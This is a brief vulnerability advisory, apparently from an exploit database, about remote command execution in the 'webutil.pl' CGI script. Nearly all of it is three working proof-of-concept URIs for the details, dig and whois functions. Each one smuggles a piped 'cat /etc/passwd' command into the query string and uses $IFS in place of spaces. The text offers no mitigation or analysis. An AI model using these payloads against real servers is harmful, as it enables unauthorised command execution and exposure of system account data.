Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities

Webutil 'webutil.pl' Multiple Remote Command Execution Vulnerabilities

The following proof-of-concept URIs are available:

http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd